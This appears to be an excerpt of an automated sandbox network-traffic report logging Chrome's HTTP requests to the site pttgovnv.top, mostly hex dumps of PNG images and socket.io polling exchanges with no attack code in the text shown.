          2024-09-01 22:25:26 UTC1369INData Raw: f5 e3 14 eb 1c 04 b0 9e 80 03 b1 76 a3 86 2b e0 e4 1b 8e 96 fe 14 fb 9e ee 34 b8 94 2f 7c 69 b2 18 f9 b3 c3 78 9a ae 55 42 a2 08 13 1b 08 89 a2 80 eb 2b 4b 17 ce 7b ca c4 b9 7b 16 88 b6 b9 d3 c6 4a 02 6e 81 d9 cf 82 35 cd 6c c3 7a f9 e4 36 59 04 38 da fd 54 87 2b 10 d1 10 54 b0 5a 36 df 3f 59 3e 96 46 92 49 62 9d 8d 1a 89 80 f3 fe 56 49 c0 35 7d ed 0a d1 3d 69 bc ec 46 f7 f0 3c 93 1d 08 a1 88 23 24 a1 04 1c 1e f7 8e b6 8b 82 e7 4f 18 2a 90 1b f2 33 6f bc dc 74 f1 5c 59 08 98 c8 56 45 82 83 e9 02 bd ef b7 f3 80 9b 00 fb 18 b1 8a 7a 6e ee 58 67 a3 5a 29 e0 94 ef ee a8 2a 3a a9 7a 99 42 8e 10 8a 38 42 e2 5e c0 2d 15 ea 18 b8 f4 14 b9 6e 46 e1 b3 47 22 12 72 8a 5b 35 1c cc f4 56 6d bf d9 98 6b 14 ee 40 58 95 ce 3c bc 70 d8 1f f3 09 73 ef 11 53 3e f1 98 18 37
          Data Ascii: v+4/|ixUB+K{{Jn5lz6Y8T+TZ6?Y>FIbVI5}=iF<#$O*3ot\YVEznXgZ)*:zB8B^-nFG"r[5Vmk@X<psS>7
          2024-09-01 22:25:26 UTC1369INData Raw: a1 04 4c b7 b3 4e 53 70 f9 ec a7 b2 79 9a 16 b0 de ae c8 e3 e3 f1 7b f0 bb 8c 09 c1 a9 9a ef d7 73 0b e3 f7 58 21 e6 20 e0 1b 56 2d 36 24 a8 86 58 c0 81 aa 80 f1 3e 78 be a8 6b c8 ad f5 9c 57 84 10 8a 38 42 a2 26 e0 0a 3c 02 ce 27 13 d5 7f bd b4 8e 9e 8f 99 fd ec 70 84 5c b8 6e 55 4c ca bd 61 c4 bd 79 df df db 2d 9a 6b 36 c9 25 35 60 bd 3a fb d1 46 9f d7 61 95 d3 a2 78 fa 4d 41 3f b3 a7 5d db 15 09 8b 1e 44 cf f4 5b 7e 22 5b f5 02 8e 49 cd db 41 c5 13 b2 5c 8d 02 c1 69 34 a6 0d d9 a8 fe a8 dd c9 fe 74 34 1d 0d 10 73 a1 f6 85 55 c4 81 80 03 65 fb 5f 5a 5e 19 44 dc 29 7e 7d 25 63 95 89 0e 84 50 c4 11 12 35 fc 13 19 34 cb 24 a4 5d 70 97 87 f3 e1 e1 08 39 b3 6e 55 ac 8b d8 aa 70 6b d5 29 9c 3d f4 96 24 5c 76 8b 3e 8d ec 4d 58 e5 b4 6a a6 41 bc c0 f5 aa 85 bb
          Data Ascii: LNSpy{sX! V-6$X>xkW8B&<'p\nULay-k6%5`:FaxMA?]D[~"[IA\i4t4sUe_Z^D)~}%cP54$]p9nUpk)=$\v>MXjA
          2024-09-01 22:25:26 UTC1369INData Raw: 01 b5 f7 7c c6 42 d9 3c 53 c9 1c a1 84 5c 24 02 2e 5c eb 5b 28 d2 ea 7a 53 c4 80 b4 5f 97 8c 12 9e 73 6d 15 2f 45 84 68 93 ce 5d 40 48 20 8a 1b b5 e7 ca 2c d1 7c cb 2c d1 97 9b 95 99 22 44 69 24 9f 09 21 27 c4 6e 91 fd 5a 73 44 42 ae f9 7e 11 71 8d 37 7f 10 ff 55 b6 f0 01 1f cb 10 1e 8f 9b fb cf 72 12 80 bf a5 09 b1 6e a3 67 7d 36 c0 92 84 58 b7 a6 9a ad 01 eb 43 e8 f8 77 5f d0 22 98 45 cb bf 37 2a 84 18 dc 8c 19 85 e3 65 17 2c 2c 78 3d 9d 4e 9f 0c 51 c4 ef ed 7f 69 79 c0 ef d4 02 db ec 15 6b d9 23 25 b1 56 e4 f3 1e 7c 56 76 90 56 5b fe 85 7c 83 91 37 2e f4 ef 87 d0 3d b5 eb b7 ba 59 ae 10 70 70 1d 63 ff a3 bd 99 d1 f2 25 8a 90 2b fa d9 07 5e c1 15 89 80 83 f5 ad 70 dd 21 cb c4 9b b2 3d c8 b2 86 25 39 e7 ef 5e 17 32 dc aa eb 0b 4f 1e a9 e6 95 89 10 8a 38
          Data Ascii: |B<S\$.\[(zS_sm/Eh]@H ,|,"Di$!'nZsDB~q7Urng}6XCw_"E7*e,,x=NQiyk#%V|VvV[|7.=Yppc%+^p!=%9^2O8
          2024-09-01 22:25:26 UTC1369INData Raw: 05 23 14 71 84 0c 6f 11 07 c1 a6 04 1d 6d 96 26 86 2a e5 35 33 22 4e 2d 08 22 b1 ca 69 09 39 2b 1a 93 43 40 a0 ae 98 ff e4 0f 42 65 99 9a b5 e4 58 01 62 0d 1d a7 9b 84 e3 e4 79 e1 f8 b0 55 a4 d7 f4 c6 7c 5c f4 56 a4 0b d7 f4 3c e1 2a 1d 29 09 bb 22 4b 32 92 c3 39 56 7a c0 62 aa 2e 2f 82 c4 15 74 db 80 60 87 ab 35 9c b6 5d c5 cf 6f 15 b6 bd 91 25 9e c0 fa 76 e1 96 19 11 8d 59 89 c5 92 88 ab 56 9d ab 78 ac c4 ca ad 93 ce d5 65 bc 82 11 8a 38 42 86 af 80 83 60 53 77 68 5f ac ae 0c 1f 8e 88 53 44 57 24 56 39 b5 90 b3 42 c0 79 3f 57 9a e0 dd dd 17 02 2c 41 b0 e2 54 2c 7a 40 d3 1d 17 8e 35 27 1c 6c e7 5b 44 d6 c1 3a e1 38 d2 1a b1 80 88 06 10 25 ae c9 79 a2 73 da 04 4b 8e 45 50 01 ab 61 35 55 40 1c 1c f0 3f 4e fe 65 61 e0 5e cd 2f 9b 13 b6 15 15 c7 a2 f8 f1 5d
          Data Ascii: #qom&*53"N-"i9+C@BeXbyU|\V<*)"K29Vzb./t`5]o%vYVxe8B`Swh_SDW$V9By?W,AT,z@5'l[D:8%ysKEPa5U@?Nea^/]
          2024-09-01 22:25:26 UTC1369INData Raw: df a7 fb d4 42 e0 5e 3d bf f4 63 61 d7 95 8b 07 86 b2 0b 07 6e 82 da e7 8e 15 23 fe 53 ee 2d 7b 42 12 71 e5 1c 55 84 22 8e 90 e4 11 70 55 d2 7f 9b 5c f3 e5 c9 72 60 c0 6e 4b 89 c6 f7 84 63 95 4b 24 37 2a ac 2c 85 bf dd c3 d2 21 51 00 a5 48 9a bf 58 99 30 62 5e 19 ef 48 54 18 aa 5a 80 1d 37 17 8a ce e9 e3 45 cf d8 51 c2 76 e6 7c 6f f1 7f ec 49 f7 bc c4 72 23 64 58 c0 b6 5b 64 b8 b0 4c 1e f0 1d 7d 22 ff 9d 03 29 10 23 d1 00 81 ea 4d 77 5c 2d 2e dc 5b 2e c7 3c 19 b1 20 e8 09 38 04 b3 67 17 96 c5 85 80 2b fa d9 07 14 70 51 02 fb 15 fb 37 5a 63 33 2a db dc d6 21 77 73 88 a5 80 83 d8 c5 8d cf e9 1f 5e 2b 9c d7 cf 96 05 9c 7c ee 65 d8 1b fd cf 77 42 92 1d 5a e2 48 d2 e3 49 68 b8 80 c7 b0 c4 39 b6 75 5c 14 50 f3 4b 45 77 f9 98 a8 b8 b1 8c 58 e5 8c b8 51 8b 2f 5d
          Data Ascii: B^=can#S-{BqU"pU\r`nKcK$7*,!QHX0b^HTZ7EQv|oIr#dX[dL}")#Mw\-.[.< 8g+pQ7Zc3*!ws^+|ewBZHIh9u\PKEwXQ/]
          2024-09-01 22:25:26 UTC1369INData Raw: af 1e 4f ad f5 fb 42 ae 83 6c ee ac 8a 46 59 cc b5 cf 9c 14 cb 5e b0 3e 22 4e c3 a5 5a ce 2c 55 42 11 47 48 e2 a0 b6 c2 55 07 4c 48 b3 33 9c f6 dd dd 05 d1 b2 96 20 36 08 ae a5 70 ca 94 64 16 54 f8 fe 5d 58 2e bb 58 1d 99 05 a2 6c e1 03 3e af 29 a5 45 9a 6a b6 8a c9 d7 3f ec 33 21 1b b5 c2 c9 0d ed 7f 71 c0 d2 7d 60 bb 71 b2 c8 f8 dc 5d c2 b6 e4 0b 43 72 f0 53 f2 8a 24 31 f7 6f f2 d2 bb 73 83 70 6d f8 93 70 fd ea dd a4 19 dc c8 58 3d f3 70 51 58 22 29 1c f1 a6 b8 f3 f5 c0 38 6f 7c 60 d1 50 ec 12 2d 81 86 f3 fe 56 d5 f5 80 35 e3 08 45 1c 21 09 28 e2 d6 fb bf d8 37 c2 26 5d f4 bb 2b a3 7a 72 a1 4c 49 4d bd c8 13 f5 a2 6b 49 9e b8 70 43 a5 ee a4 ab d5 23 15 a2 ee b2 5b 03 e7 1f 14 fb 55 e2 93 32 f3 4a 7c 26 65 33 56 b8 11 6f ee b1 2c 91 01 e2 2d f3 be ff 6d
          Data Ascii: OBlFY^>"NZ,UBGHULH3 6pdT]X.Xl>)Ej?3!q}`q]CrS$1ospmpX=pQX")8o|`P-V5E!(7&]+zrLIMkIpC#[U2J|&e3Vo,-m


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          79192.168.2.449823172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:26 UTC669OUTPOST /socket.io/?EIO=4&transport=polling&t=P6liMU2&sid=-SnapXukcxVrNsxsBQUE HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          Content-Length: 2
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          Accept: */*
          Content-type: text/plain;charset=UTF-8
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Origin: https://pttgovnv.top
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Referer: https://pttgovnv.top/help/
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:26 UTC2OUTData Raw: 34 30
          Data Ascii: 40
          2024-09-01 22:25:26 UTC612INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:26 GMT
          Content-Type: text/html
          Transfer-Encoding: chunked
          Connection: close
          Access-Control-Allow-Origin: *
          cache-control: no-store
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AN%2FcVhBSv%2FmbUZD5OZ6COqoOSmBGLsC9oTZ6n0LGZnl5vWSjk4YrptrAzyUqvWLq0wNu%2BXzwqs7w8TKwOhzk3q3l9hmAW8S7RNHyvdBff9vEyi0l6aGoTBQR7bi5WDg%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad1caeeb4349-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:26 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
          Data Ascii: 2ok
          2024-09-01 22:25:26 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          80192.168.2.449822104.21.47.250443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:26 UTC361OUTGET /help/layout/images/40.png HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: */*
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:26 UTC726INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:26 GMT
          Content-Type: image/png
          Content-Length: 10746
          Connection: close
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:36 GMT
          ETag: W/"29fa-18fc3d82ee0"
          CF-Cache-Status: HIT
          Age: 36235
          Accept-Ranges: bytes
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Tdi4eXiHNMEcRzqMF6SAj%2BC3hBhXnsXCHCuptNvGKWJ2Bjc5nCKrOhxKFJ%2BbZQQd8Z0KchSWSQuMu8kW%2FlJsnL39enNudG5TmPkm87jUdSFO%2BJxpzBPCpOOMHxfoXFw%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad1ccd3c0cd9-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:26 UTC643INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 29 87 49 44 41 54 78 da ec dd 3d 76 db 56 c2 06 60 4c ce 77 ce 94 56 56 60 a5 72 29 4d e5 d2 f4 0a ac 94 53 99 5e 81 95 15 98 5e 41 e4 15 98 ae a6 8c bc 02 53 a5 ab 48 a5 ab c8 2b 18 a9 9c ca 1f 2e 71 19 d1 b2 7e f0 73 2f 00 52 cf 73 0e e3 4c c6 12 41 10 b8 78 ef ff 3f be 7d fb 56 00 00 b0 59 7e 72 0a 00 00 84 38 00 00 84 38 00 00 84 38 00 00 21 0e 00 00 21 0e 00 00 21 0e 00 40 88 03 00 40 88 03 00 40 88 03 00 10 e2 00 00 10 e2 00 00 10 e2 00 00 10 e2 00 00 84 38 00 00 84 38 00 00
          Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<)IDATx=vV`LwVV`r)MS^^ASH+.q~s/RsLAx?}VY~r888!!!@@@88
          2024-09-01 22:25:26 UTC1369INData Raw: 10 e2 00 00 10 e2 00 00 10 e2 00 00 84 38 00 00 84 38 00 00 84 38 00 00 21 0e 00 00 21 0e 00 00 21 0e 00 00 21 0e 00 40 88 03 00 40 88 03 00 40 88 03 00 10 e2 00 00 10 e2 00 00 10 e2 00 00 84 38 00 00 84 38 00 00 84 38 00 00 21 0e 00 00 21 0e 00 00 21 0e 00 00 21 0e 00 40 88 03 00 40 88 03 00 40 88 03 00 10 e2 00 00 10 e2 b6 c2 e7 27 93 f2 b5 ef 44 00 00 7d fa c7 b7 6f df 9c 85 ee 41 ee bc fc e7 bc 78 fa 65 e6 64 3c 6c ff fc cf e9 6e f9 c7 ee c0 87 71 f1 bf 7f ef 9f 8e f8 1c 85 4a cf ce 18 3f 43 79 6c e1 b8 ea 54 ca 4e cb e3 bb d8 90 f2 e9 fa 35 79 51 96 55 a7 5b 79 03 fe f8 59 8b f2 b3 2e 94 4c 08 71 dc 55 70 4c ca 7f 7e 2a 5f 5f cb d7 ac 2c 34 e6 4e ca 83 0b 6f d3 e5 77 5f 14 8f 47 76 68 67 e5 2b 54 32 c2 43 7b 51 06 8f c5 40 e7 67 27 9e 9f 70 9e 1e d5
          Data Ascii: 888!!!!@@@888!!!!@@@'D}oAxed<lnqJ?CylTN5yQU[yY.LqUpL~*__,4Now_Gvhg+T2C{Q@g'p
          2024-09-01 22:25:26 UTC1369INData Raw: 14 ad 71 74 0d 70 8b a2 ea 75 10 e0 a0 85 ff 73 0a 46 19 e6 e6 cb da 69 e8 ae ac 5a 3b d6 6b a9 d5 98 b9 30 26 29 ec c0 10 fe ac 33 40 37 04 c4 ea 77 cd e2 98 b6 c3 18 0c 53 7a b9 7c 7d 7e f2 61 f9 3e d5 7b 52 cf 59 fc 4e 52 09 61 3a b4 ec 4e 32 3f 24 0f 0b b3 55 19 77 80 7b a7 0b 15 21 8e ae 05 56 08 4e c7 8d 66 44 85 2e d6 d0 ba 55 3d 28 df 5c fb 7f 57 2d 60 87 8d c2 5c f5 7b 8f 97 c7 52 b5 9a cd e2 b1 a5 ec ce 58 85 b9 b7 8d 8e eb 61 bb f8 df bf f7 17 39 7e f1 3f ff 73 ba 1f af a1 97 19 7e fd 5e f8 fd e5 b1 5b 34 95 31 06 b8 57 b1 52 0c 5b 49 77 6a 1f aa 10 13 82 d2 7f e3 d8 b6 59 ed f5 d7 aa 09 0b 21 68 85 ee d0 9b b6 e3 5a 85 b9 f3 d8 72 d7 e4 b8 ce 63 17 43 08 73 39 ba 5a db 1d 17 49 85 80 55 be c2 f7 fc bc c8 33 7b 79 ea 2c 23 c0 81 10 b7 cd a6 f1
          Data Ascii: qtpusFiZ;k0&)3@7wSz|}~a>{RYNRa:N2?$Uw{!VNfD.U=(\W-`\{RXa9~?s~^[41WR[IwjY!hZrcCs9ZIU3{y,#
          2024-09-01 22:25:26 UTC1369INData Raw: 9e 16 29 57 19 af f6 47 3d ac bd ce 4f e8 9e ac 5a e5 7e 2b 7e 1c 2b f7 fb e8 d7 58 eb 1e e4 de 8c 7d 3c c2 96 48 d1 b2 7b e1 34 0a 70 d9 02 5c 28 4b c6 1a e0 aa ae be e3 a2 db c4 ae 21 43 49 8a fb 7f 3f c1 79 9c dc 70 6d 85 5d 8a c6 d4 a2 f9 68 79 4c f9 c7 17 0a 71 1d 02 dc 34 86 b7 db 9a c3 bb d4 38 42 9f fe 74 59 5b fb fc e4 5b 1c 9f 70 b4 bc 20 ee ba 91 aa 25 46 c2 ff ff f1 86 da cb f9 d8 6a 06 89 83 dc dc 55 29 c4 31 ca f0 b2 df 5b 80 1b ef 39 58 cd c8 7c b1 a1 df e2 6a 05 84 ae e7 38 45 eb e3 4e cf 95 83 2e de 8f 25 c8 09 71 57 e1 6d 12 f7 31 bc 6f d6 4b fb 96 af aa 26 19 42 e0 aa eb 29 8c 4f 78 1d df f3 cf 18 ec 4e 63 0b db 6c 19 ce 56 b5 93 6a ac 5c 08 6b d7 77 4c 58 d5 0c 8e 46 dc 2a 77 58 b4 ef 6e 7b b6 91 2b 94 6f ce 75 df 65 11 e9 75 63 5f 16
          Data Ascii: )WG=OZ~+~+X}<H{4p\(K!CI?ypm]hyLq48BtY[[p %FjU)1[9X|j8EN.%qWm1oK&B)OxNclVj\kwLXF*wXn{+oueuc_
          2024-09-01 22:25:26 UTC1369INData Raw: 84 f7 c5 30 eb cb f4 33 6e 23 d4 da 9e 7e d9 2d aa 2e d6 cb b5 9a ea 9b 62 b5 1e dc 66 86 b9 a6 b5 3b 63 af c6 e3 a3 56 38 7a a9 28 0c b7 f8 6c 8e 07 72 3f a1 b4 ea 2e fc 9a e8 b7 bd 18 70 b1 f5 b3 ec e7 ac 0a 72 bf 8d f8 9a d9 be 10 17 c7 bd 85 00 f0 69 e0 1a 63 bf 83 6f 43 0d ee e9 97 10 d6 d6 5b e6 1e c5 10 7b 1e 5b e6 76 37 e6 8b ac 9a 9b 9b 8c df 38 f7 4c 1b 85 cb 62 33 d7 90 62 f3 54 8b cf 0e a5 1a ba 92 6a 6c f5 87 9e 27 9e cd 36 f6 59 b7 1e 86 fa 58 b2 a3 0a bd 29 17 53 7e dc 57 e5 63 a3 42 dc da 2c bb bf 8a 7e 56 cc be b7 86 92 bd 4b f5 e6 0b 6e d5 32 f7 bc a8 66 79 5e 16 57 2d 73 7f c5 6d b7 36 65 87 83 45 86 eb 64 56 90 f5 e1 30 e2 6d ac d8 3e 7b 71 79 8f 4d af a8 f7 bb 10 6c 35 ee 2e 55 6b dc 64 80 73 ff 76 83 43 6f 15 40 85 b8 ef 1e cc e1 84
          Data Ascii: 03n#~-.bf;cV8z(lr?.pricoC[{[v78Lb3bTjl'6YX)S~WcB,~VKn2fy^W-sm6eEdV0m>{qyMl5.UkdsvCo@
          2024-09-01 22:25:26 UTC1369INData Raw: 67 b8 ff 2e cc 30 65 e0 00 b7 da 99 25 fc dc a7 4c c7 f5 78 a4 f7 f5 36 e9 63 fd b6 71 94 55 d5 f5 2a c4 85 2e 9a 38 91 61 91 28 c8 85 b1 3b bd 0d bc 8e c7 7f d0 b2 e0 99 c7 ed b8 34 41 37 37 6b b2 62 77 cd ae d4 eb e1 7c 6c 85 fd 79 a2 f1 9c 30 ae 00 77 f5 60 0c 5b 1a b5 9d 34 56 c7 eb f2 f7 2f 7a da cd e1 a1 f9 3a f0 ae 13 dc 22 fb 98 b8 18 62 42 90 4b 31 75 78 b7 ef 50 14 5b d3 da 4c 93 5f d5 0c b9 df 64 ed df 3f c6 85 42 9b 68 1a c8 74 77 43 d3 0a 74 97 00 b7 5e 41 cb db ad 3a d7 ad 9a c5 d4 29 78 a0 21 2e 71 90 7b 19 17 07 ee 55 6c 21 69 b3 08 f0 6b bb 05 34 ac ed 35 2c 2c e2 f8 b6 26 93 15 2e 85 38 68 e4 d5 72 a9 90 14 aa 99 ac 39 5b c1 6d b5 97 e7 fb 5f 38 0d 0f 38 c4 6d 43 90 8b 41 a1 4d 0d f2 d8 4e 0e f7 da fd fb 1c df bf 5c c1 4d 35 c4 26 63 16
          Data Ascii: g.0e%Lx6cqU*.8a(;4A77kbw|ly0w`[4V/z:"bBK1uxP[L_d?BhtwCt^A:)x!.q{Ul!ik45,,&.8hr9[m_88mCAMN\M5&c
          2024-09-01 22:25:26 UTC1369INData Raw: a0 94 b2 b0 7d 9c b8 36 ff 50 e5 3e 87 d5 6e 0e fd 5e 1b b3 51 9c d9 fa 01 ee 2a c8 0d d3 b5 1a be a3 83 9e ce c9 4e 86 ef 47 88 bb 23 1c 85 1b fc 79 87 da 5a a8 5d f4 d5 2a 17 6a 13 93 16 c7 1a 96 d1 38 7d a8 ad 72 2d 02 dc b4 60 cc 52 16 68 8f 8a 84 ad 67 71 08 44 ca f5 9c de 98 75 de d1 d3 2f 8b 8e 95 f5 5a df 53 8d ae c2 e3 22 dd d2 27 2f 07 1b b0 7f 15 56 42 39 f9 67 d1 7c dc d7 50 d7 f3 bc a7 ee dc 79 91 76 2c dc 59 ee 45 7e 37 36 c4 ad 15 bc 61 1f d2 f0 e5 be ea 70 93 f5 d5 2a 77 1a 8f b5 69 a1 14 6a f5 9f e2 ba 77 bb 02 dc 8d 7e 13 e0 1e 5c 88 5b 56 c4 12 4f 06 4a 7d 7c 73 eb 40 76 36 2b f2 2f 96 3a bf 27 4c 5e 24 be 36 8e 06 3b 9b 55 80 6b bb 57 f9 50 bd 42 8f 8a 76 3b 6e 34 39 2f e1 3a 7b d1 eb 75 25 c4 7d 17 90 c2 c9 0a 01 a7 ed 60 d8 bf 5b e5
          Data Ascii: }6P>n^Q*NG#yZ]*j8}r-`RhgqDu/ZS"'/VB9g|Pyv,YE~76ap*wijw~\[VOJ}|s@v6+/:'L^$6;UkWPBv;n49/:{u%}`[
          2024-09-01 22:25:26 UTC1369INData Raw: b5 63 cc 7d 26 03 54 42 fa 2a 93 27 7d ae 75 b6 f6 dd 4e cb ef b6 d8 a0 20 f7 6e c8 00 17 fc 54 70 53 e1 7d 1c b7 72 fa b9 a8 b6 f5 aa b3 79 f7 e3 e2 6a 31 de a3 dc db 64 c5 ad bc 42 ab 55 78 9f 7f 15 d5 72 28 5f 37 e8 34 9f c5 73 bb 1b 66 fe 0a 70 0f ba f2 34 29 da ef 83 9c fb f8 0e 8b f6 bb c1 f4 17 6a d2 3a dd 80 4b e7 28 63 79 b7 53 f3 bc 5f 8c f9 da ed 18 e0 4e 07 bc 9e a7 35 9f b9 43 0b e3 27 07 df 91 45 88 bb a7 a5 20 d4 c6 cb d7 41 83 40 f7 28 d6 dc ff 8a 7b 9e 1e f4 70 9c eb 81 2e ec 5a f1 db 48 6f 82 b3 f8 40 fc 25 ec 5a 11 cf ad f0 e6 3e 3b 1d 79 90 9b c5 7b 7f cc 52 06 9a f3 d1 5f 34 55 80 3a 1c c5 71 54 e3 c6 3e 6c c1 ad 18 ee bf fd 41 03 dc 95 b1 07 b9 de d7 83 bb 8d ee d4 06 81 ae a8 ba 4b e7 71 2c cf aa cb 75 52 dc de 15 14 d6 a5 79 51 fe
          Data Ascii: c}&TB*'}uN nTpS}ryj1dBUxr(_74sfp4)j:K(cyS_N5C'E A@({p.ZHo@%Z>;y{R_4U:qT>lAKq,uRyQ
          2024-09-01 22:25:26 UTC520INData Raw: 00 00 21 0e 00 00 21 0e 00 00 21 0e 00 40 88 03 00 40 88 03 00 40 88 03 00 10 e2 00 00 10 e2 00 00 10 e2 00 00 10 e2 00 00 84 38 00 00 84 38 00 00 84 38 00 00 21 0e 00 00 21 0e 00 00 21 0e 00 40 88 03 00 40 88 03 00 40 88 03 00 10 e2 00 00 10 e2 00 00 10 e2 00 00 10 e2 00 00 84 38 00 00 84 38 00 00 84 38 00 00 21 0e 00 00 21 0e 00 00 21 0e 00 40 88 03 00 40 88 03 00 40 88 03 00 10 e2 9c 02 00 00 21 0e 00 00 21 0e 00 00 21 0e 00 40 88 03 00 40 88 03 00 40 88 03 00 10 e2 00 00 10 e2 00 00 10 e2 00 00 84 38 00 00 84 38 00 00 84 38 00 00 84 38 00 00 21 0e 00 00 21 0e 00 00 21 0e 00 40 88 03 00 40 88 03 00 40 88 03 00 10 e2 00 00 10 e2 00 00 10 e2 00 00 84 38 00 00 84 38 00 00 84 38 00 00 84 38 00 00 21 0e 00 00 21 0e 00 00 21 0e 00 40 88 03 00 40 88 03 00 40
          Data Ascii: !!!@@@888!!!@@@888!!!@@@!!!@@@8888!!!@@@8888!!!@@@


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          81192.168.2.449824104.21.47.250443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:26 UTC361OUTGET /help/layout/images/41.png HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: */*
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:26 UTC730INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:26 GMT
          Content-Type: image/png
          Content-Length: 19866
          Connection: close
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:36 GMT
          ETag: W/"4d9a-18fc3d82ee0"
          CF-Cache-Status: HIT
          Age: 36235
          Accept-Ranges: bytes
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MnUBFAyWfjdICMi7oFIE8NxOx5Z6LfcuxB1YS%2FvIo5pr8f66N%2BnzKu8b%2F15%2BgVBeBnaJFSw%2Bbn31RQKaujmnLDE87asNodb7b3%2BafGvsTx6apOKcGYiZ4CKeBvKQMcY%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad1cc89d8c4d-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:26 UTC639INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 4d 27 49 44 41 54 78 da ec dd 0b 78 5c 77 79 e7 f1 d7 ba f8 ee 48 b6 e3 6b 8c 25 43 6e 84 8b 94 90 44 21 24 68 1c 42 bb 4d f2 60 65 cb 66 69 bb ac 65 fa 6c 16 b6 2d 56 ba ec b2 6c 21 1e 17 b6 2c 94 12 f9 d9 87 07 96 2d f5 b8 a5 5c d2 dd 46 ce 93 a4 40 21 1e 25 21 c5 04 92 31 21 21 24 21 1a d9 8e e3 bb 25 cb b2 25 df b4 e7 3d e7 3f d2 cc 68 24 cd 39 73 ce 99 33 d2 f7 f3 3c 27 8e 6e 33 67 ce 9c 99 f3 9b f7 7f 9b 35 32 32 22 00 00 00 a8 2c 55 1c 02 00 00 00 42 1c 00 00 00 08 71 00 00
          Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<M'IDATxx\wyHk%CnD!$hBM`efiel-Vl!,-\F@!%!1!!$!%%=?h$9s3<'n3g522",UBq
